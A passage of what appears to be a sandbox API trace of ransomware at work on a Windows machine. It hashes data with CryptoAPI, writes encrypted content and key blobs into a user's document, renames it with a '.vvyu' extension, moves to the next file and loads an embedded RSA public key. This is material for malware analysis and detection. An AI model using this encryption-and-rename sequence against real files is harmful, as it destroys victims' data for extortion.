dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.841] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.841] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.841] GetLastError () returned 0x0 [0193.841] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.841] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.842] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.842] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.842] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6d0) returned 0x2ea79b0 [0193.842] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0b58 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b08 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0ba0 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.843] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1a68 [0193.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6573d8 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657300 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.847] GetCurrentThreadId () returned 0x66c [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f6e0 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.847] GetCurrentThreadId () returned 0x66c [0193.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6573d8 [0193.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643af0 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572b8 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657300 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea1a68 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea1c78 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea1e90 [0193.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c78 | out: hHeap=0x620000) returned 1 [0193.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e90 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0ba0 | out: hHeap=0x620000) returned 1 [0193.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.862] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xd6c6, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xd6c6, lpOverlapped=0x0) returned 1 [0193.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.864] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd6cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.864] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea1a68 [0193.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea1a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea1e98 [0193.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.865] WriteFile (in: hFile=0x568, lpBuffer=0x2ea1e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea1e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e98 | out: hHeap=0x620000) returned 1 [0193.865] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.865] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.866] CloseHandle (hObject=0x568) returned 1 [0193.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0193.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea1a68 [0193.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0193.867] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\jw5nfUjDO04Vpw2Wo.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\jw5nfujdo04vpw2wo.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\jw5nfUjDO04Vpw2Wo.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\jw5nfujdo04vpw2wo.xlsx.vvyu")) returned 1 [0193.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.869] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0193.873] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a879a0, ftCreationTime.dwHighDateTime=0x1d89a5e, ftLastAccessTime.dwLowDateTime=0xa1b4cd00, ftLastAccessTime.dwHighDateTime=0x1d89bbb, ftLastWriteTime.dwLowDateTime=0xa1b4cd00, ftLastWriteTime.dwHighDateTime=0x1d89bbb, nFileSizeHigh=0x0, nFileSizeLow=0x177e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K0lcD1nSajNFFT.odp", cAlternateFileName="K0LCD1~1.ODP")) returned 1 [0193.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0ba0 [0193.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0ba0 | out: hHeap=0x620000) returned 1 [0193.873] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\K0lcD1nSajNFFT.odp") returned=".odp" [0193.873] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\K0lcD1nSajNFFT.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\k0lcd1nsajnfft.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.874] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=96230) returned 1 [0193.874] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.876] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x177c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.876] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.878] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.878] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x177e6, lpOverlapped=0x0) returned 1 [0193.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC 